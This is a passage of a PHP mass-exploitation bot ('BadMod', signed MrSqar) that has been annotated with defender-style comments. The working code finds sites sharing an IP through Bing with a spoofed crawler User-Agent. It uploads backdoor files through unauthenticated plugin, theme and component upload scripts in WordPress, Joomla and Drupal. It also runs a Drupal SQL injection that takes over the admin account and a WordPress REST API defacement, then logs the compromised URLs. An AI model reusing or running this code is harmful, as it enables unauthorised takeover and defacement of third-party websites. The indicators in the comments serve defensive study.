 * cookies or credentials; fetch BadMod.php directly under the endpoint path
 * and treat "Hacked" in the body as confirmation; append the URL to
 * result/Hacked.txt.
 *
 * Defensive relevance: the sample server-side handler distributed with an
 * upload widget should not be left reachable on a production site; where an
 * upload endpoint is needed, enforce an allow-list of file types and serve
 * stored files from a location that does not execute scripts. Log pattern:
 * GET then multipart POST to .../jquery-file-upload/server/php/.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_jquery($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$file = "BackDoor/BadMod.php";
$file = realpath($file);
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($file);
} else { //
  $cFile = '@' . realpath($file);
}
$post = array('files'=> $cFile);
$target1 = $target."/assets/global/plugins/jquery-file-upload/server/php/";
$source1 = @file_get_contents("$target1");
if(preg_match("/files/",$source1)){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The POST response is stored but never inspected.
$result=curl_exec ($ch);
curl_close ($ch);
$hack = $target1."/BadMod.php";
$source = @file_get_contents("$hack");
if(preg_match("/Hacked/",$source)){
echo $red."  [wp_jquery] -===========- ".$green." Done !\n";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$hack);
fwrite($hacked,"\n");
fclose($hacked);
}else{
echo $red. "  [wp_jquery] -===========- ".$orange."Failed"." \n";
}
}else{
echo $red. "  [wp_jquery] -===========- ".$orange."Failed"." \n";

    }
}
/**
 * Attempts a file upload through the WordPress admin page
 * "dreamwork_manage".
 *
 * Flow as written: send a multipart POST to
 * /wp-admin/admin.php?page=dreamwork_manage with task="drm_add_new_album",
 * album name/description text and BackDoor/BadMod.html as "album_img", with
 * no cookies or credentials; if the response contains "wp-content", derive
 * the stored path from the text after that string, fetch it and treat
 * "Hacked" in the body as confirmation; append the URL to result/Hacked.txt.
 * Nothing is printed when that final check fails.
 *
 * Defensive relevance: an admin page handler that processes a POST before
 * checking for a logged-in administrator is the exposure; update or remove
 * the plugin. Log pattern: multipart POST to admin.php with
 * page=dreamwork_manage from a client that holds no session cookie.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_dreamwork($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$file = "BackDoor/BadMod.html";
$file = realpath($file);
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($file);
} else { //
  $cFile = '@' . realpath($file);
}
$post = array('task' => "drm_add_new_album",'album_name' => "Arbitrary File Upload",'album_desc' => "Arbitrary File Upload",'album_img'=> $cFile);
$ch = curl_init();
$target1 = $target."/wp-admin/admin.php?page=dreamwork_manage";
curl_setopt($ch, CURLOPT_URL,$target1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec($ch);
curl_close ($ch);
if(preg_match("/wp-content/",$result)){
$exp = explode("wp-content",$result);
// str_replace is applied to every element of the exploded array.
$arr = array(
'(' => "",
')' => "",
'Error' => "",
);
$rb = str_replace(array_keys($arr),$arr,$exp);
$hack = $target.$rb[1];
// "wp-content" was the split delimiter, so it is re-added when absent.
if(preg_match("/wp-content/",$hack)){
$hack = $target.$rb[1];
    }else{
$hack = $target."/wp-content/".$rb[1];
$hack = trim($hack);
    }
$src = @file_get_contents("$hack");
if(preg_match("/Hacked/",$src)){
echo $red."  [dreamwork_manage] -====- ".$green." Done !\n";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$hack);
fwrite($hacked,"\n");
fclose($hacked);
}
}else{
echo $red. "  [dreamwork_manage] -====- ".$orange."Failed"." \n";

}
}
/**
 * Attempts a file upload through upload_settings_image.php under the
 * "RightNow" WordPress theme path below.
 *
 * Flow as written: send BackDoor/BadMod.html as multipart field "Filedata"
 * with no cookies or credentials (no prior probe); fetch
 * /wp-content/uploads/settingsimages/badmod.html (lower-case name) and treat
 * "Hacked" in the body as confirmation; append the URL to result/Hacked.txt.
 *
 * Defensive relevance: a theme-bundled uploadify script that can be called
 * directly is the exposure; update or remove the theme and block direct
 * requests to its includes/ directory. Log pattern: multipart POST to
 * upload_settings_image.php followed by GET of settingsimages/badmod.html.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_rightnow($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$file = "BackDoor/BadMod.html";
$file = realpath($file);
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($file);
} else { //
  $cFile = '@' . realpath($file);
}
$post = array('Filedata'=> $cFile);
$target1 = $target."/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The POST response is stored but never inspected.
$result= curl_exec ($ch);
curl_close ($ch);
$source = "$target/wp-content/uploads/settingsimages/badmod.html";
$source2 = @file_get_contents("$source");
if(preg_match("/Hacked/",$source2)){
echo $red."  [wp_rightnow] -=========- ".$green."Done ! \n";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$source);
fwrite($hacked,"\n");
fclose($hacked);
}else
    {
echo $red. "  [wp_rightnow] -=========- ".$orange."Failed"." \n";
        }
}
/**
 * Attempts a file upload through the import-export upload.php script under
 * the "cherry-plugin" WordPress plugin path below.
 *
 * Flow as written: request the script's headers (warnings not suppressed)
 * and proceed unless the status line contains "404"; send
 * BackDoor/BadMod.php as multipart field "file" with no cookies or
 * credentials; fetch BadMod.php from the same plugin directory and treat
 * "BadMod" in the body as confirmation.
 *
 * Review notes: on success the URL written to result/Hacked.txt is
 * {target}/badmod.html, which is not the URL that was verified; the verified
 * URL is only echoed. The log handle is not closed, and the success line is
 * labelled "[upload]".
 *
 * Defensive relevance: a plugin import/upload script reachable without a
 * session is the exposure; update or remove the plugin. Log pattern:
 * multipart POST to admin/import-export/upload.php followed by GET of
 * BadMod.php in that directory.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_upload($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$target1 = $target."/wp-content/plugins/cherry-plugin/admin/import-export/upload.php";
$h = get_headers("$target1");
if(!preg_match("/404/",$h[0])){
$uploadfile="BackDoor/BadMod.php";
$uploadfile=realpath($uploadfile) ;
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($uploadfile);
} else { //
  $cFile = '@' . realpath($uploadfile);
}
$post = array('file'=> $cFile);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"$target1");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec ($ch);
curl_close ($ch);
$result2 = $target."/wp-content/plugins/cherry-plugin/admin/import-export/BadMod.php";
$h2 = @file_get_contents("$result2");
if(preg_match("/BadMod/",$h2)){
echo $red."  [upload] -==============- ".$green." Done";
$hacked = fopen("result/Hacked.txt","a+");
$def = $target."/"."badmod.html";
fwrite($hacked,$def);
fwrite($hacked,"\n");
echo $result2;
    }else{
echo $red. "  [wp_upload] -===========- ".$orange."Failed"." \n";

}
}else{
echo $red. "  [wp_upload] -===========- ".$orange."Failed"." \n";

}
}
/**
 * Sends a crafted login POST to {target}/user/login whose "name" parameter
 * carries SQL in its array key.
 *
 * What the request body does, as written: the key of the first name[]
 * element contains an UPDATE on the "users" table that sets the row with
 * uid 1 to name 'badmod' and pass to a fixed, pre-computed hash. The form
 * fields identify the Drupal user_login form. Success is inferred from the
 * response text (a PHP mb_strlen() type warning, or the echoed values
 * "FcUk Crap"), and a line with the login URL and the credentials
 * "badmod" / "admin" is appended to result/Hacked.txt. Whether the fixed
 * hash corresponds to that password cannot be verified from this listing.
 * $holako is assigned and never used.
 *
 * Defensive relevance: the defect class is request array keys reaching a SQL
 * statement unescaped; apply the vendor's core security update that fixes
 * it (advisory id not given on this page). Indicators: a POST to /user/login
 * whose body contains "name[0;update users set"; in the database, the uid 1
 * account renamed to 'badmod'. After patching, audit uid 1 and other
 * privileged accounts, since a patch does not undo an earlier change.
 *
 * @param string $target Base URL; "/user/login" is appended, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function add_user($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
    $log = "/user/login";
    $url2 = $target.$log;
    $holako = "/?q=user";
    // %3D is a URL-encoded '='; the hash is URL-encoded before concatenation.
    $post_data = "name[0;update users set name %3D 'badmod' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
    // Stream context for file_get_contents: form-encoded POST, no cookies.
    $params = array(
        'http' => array(
        'method' => 'POST',
        'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $post_data
    )
    );
    $ctx = @stream_context_create($params);
    $data = @file_get_contents("$url2", null, $ctx);
    // Case-insensitive search for either marker in a non-empty response.
    if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
$result = fopen("result/Hacked.txt","a+");
echo $red."  [add_user] ====> ".$green." Done !\n";
fwrite($result,$url2." => username : badmod  => password : admin");
fwrite($result,"\n");
fclose($result);
    } else {
echo $red. "  [add_user] ====> ".$orange."Failed"." \n";
}
    }
/**
 * Attempts a file upload through the public upload view of the Joomla
 * component com_jdownloads.
 *
 * Flow as written: send a multipart POST to
 * index.php?option=com_jdownloads&Itemid=0&view=upload with the form fields
 * below, BackDoor/BadMod.zip as "file_upload" and BackDoor/BadMod.gif as
 * "pic_upload"; redirects are followed, the connect timeout is 3 seconds and
 * a desktop-browser User-Agent string is sent. A response containing
 * `color="green">` is treated as success and a URL under
 * /images/jdownloads/screenshots/ is appended to result/Hacked.txt.
 *
 * Review notes: the 'description' key appears twice in the array literal, so
 * only the later value ("<p>Owned</p>") is sent. The logged URL is built
 * from $file2, which still includes the local "BackDoor/" prefix, and it is
 * never fetched back, so entries are unverified. The log handle is not
 * closed.
 *
 * Defensive relevance: a front-end upload form that accepts files from
 * anonymous visitors and stores them in a web-served directory is the
 * exposure; update the component, restrict uploads to authenticated users
 * and validate file content server-side. Log pattern: multipart POST to
 * index.php with option=com_jdownloads and view=upload carrying the
 * User-Agent string below.
 *
 * @param string $url Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function joom_down($url){
     $file1='BackDoor/BadMod.zip';
     $file2='BackDoor/BadMod.gif';
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile1 = curl_file_create($file1);
} else { //
  $cFile1 = '@' . realpath($file1);
}
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile2 = curl_file_create($file2);
} else { //
  $cFile2 = '@' . realpath($file2);
}
     $bbb='/index.php?option=com_jdownloads&Itemid=0&view=upload';
     $sco=($url).($bbb);
        $post=array(
    'name'=>'BadMod_MrSqar','mail'=>'mrsqar@gmail.com','catlist'=>'1','file_upload'=> $cFile1 ,'filetitle' =>"Hacked by MrSqar",
    'description'=>"<p>Hacked</p>" ,'2d1a8f3bd0b5cf542e9312d74fc9766f'=>1,
    'send'=>1,'senden'=>"Send file", 'description'=>"<p>Owned</p>",
    'option'=>"com_jdownloads",'view'=>"upload",'pic_upload'=> $cFile2
    );
        $ch = curl_init ($sco);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
        curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, TRUE);
        curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,3 );
        curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
        curl_setopt ($ch, CURLOPT_POST, TRUE);
        curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
        $data = curl_exec ($ch);
        curl_close ($ch);
    $path='/images/jdownloads/screenshots/';
    $TheEnd=($url).($path).($file2);
$red    = "\e[91m";
$green  = "\e[92m";
$orange = "\e[38;5;208m";
    // Success is inferred from markup in the response, not from a fetch.
    if(preg_match("/color=\"green\">/",$data)){
echo $red. "  [com_j-d] ====> ".$green."Done"." \n";
$result = fopen("result/Hacked.txt","a+");
fwrite($result,$TheEnd);
fwrite($result,"\n");
    }else{
echo $red. "  [com_j-d] ====> ".$orange."Failed"." \n";
    }
}
/**
 * Posts two local files to the upload script of the Drupal dragdrop_gallery
 * module and then checks whether the first file name is reachable.
 *
 * The POST goes to
 * {$target}/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/
 * with no credentials. The `filedir` query parameter carries a server-side
 * directory chosen by the client.
 *
 * Defender notes:
 *  - Indicators: requests to dragdrop_gallery/upload.php carrying a `filedir`
 *    parameter, followed by a GET/HEAD for mrsqar.gif in the module directory;
 *    files named mrsqar.gif / mrsqar.jpg on disk.
 *  - The "Done" verdict only means the follow-up request's status line did not
 *    contain "404", so an entry in the result file is a lead to verify on disk,
 *    not proof that a file was written.
 *  - Mitigation: remove or update the module and block direct access to PHP
 *    files inside module directories.
 *
 * @param string $target Site base URL without a trailing slash.
 * @return void Prints a status line; appends to result/Hacked.txt when the check passes.
 */
function drupal_upload($target){
// ANSI colour escapes for the console status line.
$green  = "\e[92m";
$red    = "\e[91m";
$orange = "\e[38;5;208m";
// Local file names, resolved relative to the tool's working directory.
$uploadfile="mrsqar.gif";
$uploadfile2="mrsqar.jpg";
$ch = curl_init("$target/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",
                                            'user_file[1]'=>"@$uploadfile2"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// The response body is captured but never inspected.
$postResult = curl_exec($ch);
curl_close($ch);
// Verification is a second request for the first file name in the module directory.
$ok = get_headers("$target/sites/all/modules/dragdrop_gallery/$uploadfile");
if(preg_match("/404/",$ok[0])){
echo $red. "  [upload] ====> ".$orange."Failed"." \n";
}else{
$result = fopen("result/Hacked.txt","a+"); 
$ok = "$target/sites/all/modules/dragdrop_gallery/$uploadfile";
echo $red."  [upload] ====> ".$green." Done !\n";
fwrite($result,$ok);
fwrite($result,"\n");
fclose($result);
}
}
/**
 * Tries to overwrite a WordPress post through the REST API without
 * authenticating, then logs a URL if the response echoes the chosen slug.
 *
 * Step 1 reads {$target}/wp-json/wp/v2/posts/ and derives a post id from the
 * text before the first comma. Step 2 sends a JSON POST to
 * {$target}/wp-json/wp/v2/posts/1 whose body carries an `id` made of that
 * value plus a non-numeric suffix, together with a new title, slug and content.
 * No Authorization header, cookie or nonce is sent.
 *
 * Defender notes:
 *  - The request shape (route id in the URL, a different non-numeric `id` in
 *    the body) matches the publicly documented WordPress REST API
 *    content-injection flaw; current WordPress core rejects it. Keeping core
 *    updated is the fix.
 *  - Indicators: unauthenticated POST to /wp-json/wp/v2/posts/<n> with a JSON
 *    `id` ending in "justracccwdata"; posts retitled "Hacked by MrSqar !" with
 *    slug "badmod.html".
 *  - A rule that rejects non-numeric `id` values on the posts routes covers
 *    this request pattern on sites that cannot be patched immediately.
 *
 * @param string $target Site base URL without a trailing slash.
 * @return void Prints a status line; appends to result/Hacked.txt on a match.
 */
function contents($target){
// Public post listing; errors are suppressed, so $source may be false.
$source = @file_get_contents("$target"."/wp-json/wp/v2/posts/");
$exp = explode(",",$source);
// Characters and the literal "id" removed from the first comma-separated
// fragment, leaving what is presumably the first post's numeric id.
$black = array(
        '{'  => '',
        '"'  => '',
        'id'  => '',
        ':'  => '',
        '['  => '',
        ']'  => '',
);
$rb = @str_replace( array_keys( $black ), $black, $exp[0] );
// Replacement post body.
$content = "
      HaCkEd bY MrSqAr HaCkEr
      BadMod Yemeni bot v1.0      
";
$file = "badmod.html";
// The body `id` is the scraped id with a non-numeric suffix appended.
$id = $rb."justracccwdata";
// The URL always addresses post 1, whatever id was scraped above.
$target2 = $target."/wp-json/wp/v2/posts/1";
$data = array("id" => $id,"title" => "Hacked by MrSqar !","slug" => $file , "content" => $content);                                                                    
$data_string = json_encode($data);                                                                                  
$ch = curl_init("$target2");                                                                      
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");                                                                    
curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);                                                                  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);                                                                      
curl_setopt($ch, CURLOPT_HTTPHEADER, array(                                                                          
    'Content-Type: application/json',                                                                                
    'Content-Length: ' . strlen($data_string))                                                                      
);                                                                                                                  
$result = curl_exec($ch);
//echo $result;
// ANSI colour escapes for the console status line.
$red    = "\e[91m";
$green  = "\e[92m";
$orange = "\e[38;5;208m";
// Success is inferred from the slug appearing anywhere in the API response.
if(preg_match("/$file/",$result)){
echo $red. "  [inject] -==============- ".$green."Done"." \n";
$hacked = fopen("result/Hacked.txt","a+");
$def = $target."/"."badmod.html";
fwrite($hacked,$def);
fwrite($hacked,"\n");
    } else {       
$red    = "\e[91m";
$green  = "\e[92m";
$orange = "\e[38;5;208m";
echo $red. "  [inject] -==============- ".$orange."Failed"." \n";
}
}
/**
 * Pages through Bing search results for a query and collects the result links.
 *
 * Requests http://www.bing.com/search with `first` stepping by 10 from 1 up to
 * 300000, stopping early once a page no longer contains the "sw_next" marker.
 * Links are pulled from each page with a fixed regular expression.
 *
 * Defender notes: target discovery happens entirely at the search engine, so it
 * leaves nothing in the logs of the sites being enumerated; the first contact a
 * victim sees comes from the probing functions. The requests present a
 * User-Agent that claims to be msnbot.
 *
 * @param string $what Search query (URL-encoded here before use).
 * @return array|null Unique, URL-decoded links; nothing is returned when no link was found.
 */
function bing($what) {
    for ($i = 1;$i <= 300000;$i+= 10) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q=" . urlencode($what) . "&&first=" . $i . "&FORM=PERE");
        // Crawler User-Agent string, not a browser one.
        curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
        // Certificate verification is switched off for any HTTPS hop reached via redirects.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        // Cookies are persisted in log.txt in the current working directory.
        curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd() . '/log.txt');
        curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd() . '/log.txt');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        $data = curl_exec($ch);
        // Capture group 1 holds the text between `;a=` and `" h="` in the result markup.
        preg_match_all('#;a=(.*?)" h="#', $data, $links);
        foreach ($links[1] as $link) {
            $allLinks[] = $link;
        }
        // No "next page" marker: last result page reached.
        if (!preg_match('#"sw_next"#', $data)) break;
    }
    if (!empty($allLinks) && is_array($allLinks)) {
        return array_unique(array_map("urldecode", $allLinks));
    }
}
  991. function site($link) {
  992.     $parse = parse_url($link);
  993.     return $parse['scheme'] . "://" . $parse['host'];
  994. }
/**
 * Prints a version string scraped from a site's /readme.html.
 *
 * The file is fetched only when its status line contains "OK". One fixed line
 * of the file is then stripped of markup fragments and echoed. Nothing is
 * printed when the readme is not served.
 *
 * Defender notes: a stock readme.html left in the web root discloses the
 * installed version to anyone who asks. Removing it or denying access to it
 * closes this one channel; the generator meta tag is a second channel the main
 * loop of this script also reads.
 *
 * @param string $target Site base URL without a trailing slash.
 * @return void Echoes the cleaned line.
 */
function get_version($target){
$OK = @get_headers("$target/readme.html");
if(@preg_match("/OK/",$OK[0])){
$source =  @file_get_contents("$target/readme.html");
// Substrings deleted from the chosen line; every key maps to ''. The '<' key
// appears twice, which is harmless in a PHP array literal.
$black = array(
        '"' => '',
        '/'  => '',
        '<'  => '',
        '>'  => '',
        'li'  => '',
        'h1'  => '',
        'h2'  => '',
        'h3'  => '',
        'h4'  => '',
        'h5'  => '',
        'head'  => '',
        'title'  => '',
        'body'  => '',
        'html'  => '',
        'style'  => '',
        'href'  => '',
        '='  => '',
        'meta'  => '',
        'http'  => '',
        'https'  => '',
        ':'  => '',
        '//'  => '',
        'www'  => '',
        'com'  => '',
        'php'  => '',
        'DOCTYPE'  => '',
        '!'  => '',
        '<br />'  => '',
        'br'  => '',
        '/>'  => '',
        '<'  => '',
);
$ex = @explode("\n",$source);
// Line index 11 is hard-coded; presumably where a stock readme carries the version — layout-dependent.
$rb = @str_replace( array_keys( $black ), $black, $ex[11] );
$rb = @trim($rb);
echo $rb;
}else {

//  echo " Error this not wordpress !! "."\n";
        }


}
  1043.  
  1044. ###############################################
  1045. #//||||||||||||  Functions end  ||||||||||||\\#
  1046. ###############################################
  1047.  
// Interactive entry point: prints a three-item menu and dispatches on the
// typed choice. The colour variables ($bold, $fgreen, $white, $yellow, $blue,
// $red, $green, $orange, $end) and the $wordpress table are defined outside
// this part of the file.
//
// Defender summary of the three modes:
//   1 - enumerate the sites that share one IP address via a search-engine query
//   2 - print random IPv4 addresses
//   3 - read a list of sites, guess each one's CMS from its home page, and run
//       every probe for that CMS against it
start1 : echo $bold.$fgreen;
echo "\n   [1] By ip only \n";
echo "\n   [2] Ip generator \n";
echo "\n   [3] import sites from txt \n\n";
start2 : echo $white."   [(Exec)]>: ";
$chos = trim(fgets(STDIN,1024));
switch($chos){
###################
#// option 1 go \\#
###################
 case 1 :  
getIp : echo $fgreen."\n   [+] Enter server ip : ".$white;
$ip = fgets(STDIN,1024);
$ip = trim($ip);
if(empty($ip)){

echo "\n   [-] Error is empty !! \n";
goto getIp;    

}
// Input containing "www" or "http" is passed through a DNS lookup.
if (preg_match("/www/",$ip)){

$ip = gethostbyname($ip);

    }elseif(preg_match("/http/",$ip)){

$ip = gethostbyname($ip);

    }
// Reverse-IP enumeration: the `ip:` query asks the search engine for indexed
// pages served from that address. On shared hosting one address maps to many
// sites, so a single weak tenant exposes its neighbours to this kind of listing.
$sitesO = bing("ip:$ip \"=\"");
// Each hit is reduced to scheme://host and de-duplicated.
$sitesR = @array_map("site", $sitesO);
$sitesA = @array_unique($sitesR);
$done = @implode("\n", $sitesA) . "\n";
// The list is appended to sites.txt in the working directory.
$sitesT = fopen("sites.txt","a+");
fwrite($sitesT,$done);
echo $yellow. "\n   [$] All server sites will saved in sites.txt , \n";
     break;
####################
#// end option 1 //#
####################


###################
#// option 2 go \\#
###################
 case 2 :
echo "\n";
echo $bold.$green."   [~] Enter number : ";
$ipG = trim(fgets(STDIN,1024));
echo $red."\n   Total ip address : ".$ipG."\n\n";  
// Prints $ipG dotted quads with every octet drawn from 40..255; the addresses
// are only echoed here, not stored or contacted.
for($i=0; $i<$ipG; $i++){
$ip1 = rand(40,255);
$ip2 = rand(40,255);
$ip3 = rand(40,255);
$ip4 = rand(40,255);
$rslt = $yellow.$ip1.".".$ip2.".".$ip3.".".$ip4;
echo $rslt;
echo "\n";
    }
echo $end;
goto start1;
 break;
####################
#// end option 2 \\#
####################

###################
#// option 3 go \\#
###################
case 3 :
echo "\n";
echo "   [+] Enter file name : ";
$txt = trim(fgets(STDIN,1024));
// Target list: one site per line, de-duplicated.
$sites = @file_get_contents("$txt") or die ("\n$red    Error file not found\n");
$exp = explode("\n",$sites);
$exp = array_unique($exp);
echo $orange.$end;
echo $green."                          [!] Total sites : ".$red.count($exp).$green." [!]\n";
foreach($exp AS $expl){
$result = fopen("result/Hacked.txt","a+");
// The home page body drives the CMS guess below.
$source = @file_get_contents("$expl"); 
//echo $source;
// WordPress branch: chosen when the home page contains "wp-content".
if(preg_match("/wp-content/",$source)){
$v = $expl;
// Version attempt 1: a fixed line of /readme.html with markup fragments stripped.
$OK = @get_headers("$v/readme.html");
if(@preg_match("/OK/",$OK[0])){
$source =  @file_get_contents("$v/readme.html");
$black = array(
        '"' => '',
        '/'  => '',
        '<'  => '',
        '>'  => '',
        'li'  => '',
        'h1'  => '',
        'h2'  => '',
        'h3'  => '',
        'h4'  => '',
        'h5'  => '',
        'head'  => '',
        'title'  => '',
        'body'  => '',
        'html'  => '',
        'style'  => '',
        'href'  => '',
        '='  => '',
        'meta'  => '',
        'http'  => '',
        'https'  => '',
        ':'  => '',
        '//'  => '',
        'www'  => '',
        'com'  => '',
        'php'  => '',
        'DOCTYPE'  => '',
        '!'  => '',
        '<br />'  => '',
        'br'  => '',
        '/>'  => '',
        '<'  => '',
        'Version'  => '',

);
$ex = @explode("\n",$source);
$rb = @str_replace( array_keys( $black ), $black, $ex[11] );
$rb = @trim($rb);
}else{
$rb = " Unknown";  
}
if(!preg_match("/Version/",$rb)){
$rb = " Unknown";  
}
// Version attempt 2: the first home-page line containing "generator", reduced
// to what is left after removing tag text, spaces and all ASCII letters.
if($rb == " Unknown"){
$file = "$expl";
$searchfor = 'generator';
$contents = file_get_contents($file);
if(!preg_match("/Version/",$contents) OR !preg_match("/Espresso/",$contents) OR !preg_match("/Event/",$contents)){
$pattern = preg_quote($searchfor, '/');
$pattern = "/^.*$pattern.*\$/m";
if(preg_match_all($pattern, $contents, $matches)){
if(preg_match("/WordPress/",$matches[0][0])){
$arr = array(
'<' => "",
'meta' => "",
'name' => "",
'=' => "",
'"' => "",
'content' => "",
'generator' => "",
'/>' => "",
'WordPress' => "",
' ' => "",
'a' => "",
'A' => "",
'b' => "",
'B' => "",
'c' => "",
'C' => "",
'd' => "",
'D' => "",
'e' => "",
'E' => "",
'f' => "",
'F' => "",
'g' => "",
'G' => "",
'h' => "",
'H' => "",
'i' => "",
'I' => "",
'j' => "",
'J' => "",
'k' => "",
'K' => "",
'l' => "",
'L' => "",
'm' => "",
'M' => "",
'n' => "",
'N' => "",
'o' => "",
'O' => "",
'p' => "",
'P' => "",
'q' => "",
'Q' => "",
'r' => "",
'R' => "",
's' => "",
'S' => "",
't' => "",
'T' => "",
'u' => "",
'U' => "",
'v' => "",
'V' => "",
'w' => "",
'W' => "",
'x' => "",
'X' => "",
'y' => "",
'Y' => "",
'z' => "",
'Z' => "",
);
$rb = str_replace(array_keys($arr),$arr,$matches[0]);
$rb = $rb[0];
}
else{
$rb = " Unknown";
}
}else{
$rb = " Unknown";

}
}else{
$rb = " Unknown";

}
}
$vuln = "";
echo $blue."\n -========================================- "."\n";
echo $red. "  Target : ".$green.$expl."\n";
echo $red. "  [CMS] -=================- ".$green." WordPress \n";
if($rb !== " Unknown"){
$ver = "Version";  
}else{
$ver = ""; 
}
// $wordpress is defined outside this part of the file; presumably a table
// keyed by version string — confirm against its definition. A hit is appended
// to result/Vulns.txt together with the target.
if(isset($wordpress["$rb"])){
$vulns = fopen("result/Vulns.txt","a+");
fwrite($vulns,"\n Target ");
fwrite($vulns," [$expl] \n");
fwrite($vulns,$wordpress["$rb"]);
fwrite($vulns,"\n -============================- \n");
fclose($vulns);
$rslt = "Saved ";
}else{
$rslt = $orange."Failed ";
}
echo $red. "  [Version] -=============- ".$green;
GetWpVer($expl);
echo "\n";
// Every WordPress probe is run against every WordPress-looking target,
// whatever version was detected. Only contents() is defined in this part of
// the file; the others are defined earlier.
// NOTE(defender): in an access log this shows up as one client requesting many
// unrelated plugin and API paths within seconds — a reliable signal for rate
// limiting or blocking, independent of whether any single probe succeeds.
echo contents($expl);
echo wp_upload($expl);
echo wp_rightnow($expl);
echo wp_dreamwork($expl);
echo wp_jquery($expl);
echo wp_ads($expl);
echo wp_formcraft($expl);
echo wp_blocker($expl);
echo wp_blazeS($expl);
echo wp_upload2($expl);
echo wp_jbm($expl);
echo wp_bsn($expl);
echo wp_qual($expl);
echo plupload($expl);
echo $red."  [Vulns] -===============- ".$green.$rslt."\n";
echo $blue."\n -========================================- "."\n";

}
// Joomla branch: chosen on loose substrings of the home page ("option=",
// "Joomla"), so pages that are not Joomla can still receive these requests.
elseif(preg_match("/option=/",$source) OR preg_match("/index.php?option/",$source) OR preg_match("/Joomla/",$source) ){
echo $blue."\n -========================================- "."\n";
echo $red. "  Target : ".$green.$expl."\n";
echo $red. "  [CMS] -========- ".$green." joomla \n";
echo joom_ver($expl);
echo joom_down($expl);
echo com_fabrik($expl);
echo $blue."\n -========================================- "."\n";
// Drupal branch: chosen when the home page merely contains "node".
}elseif(preg_match("/node/",$source)){
echo $blue."\n -========================================- "."\n";
echo $red. "  Target : ".$green.$expl."\n";
echo $red. "  [CMS] ====> ".$green." drupal \n";
echo drupal_upload($expl);
echo add_user($expl);
echo $blue."\n -========================================- "."\n";
    }
}
break;
####################
#// end option 3 \\#
####################

###################
#//  default go \\#
###################
default :
echo $red."   [-] invild choice \n";   
goto start2;
##################
#// end switch \\#
##################

}
  1341.  
  1342. ?>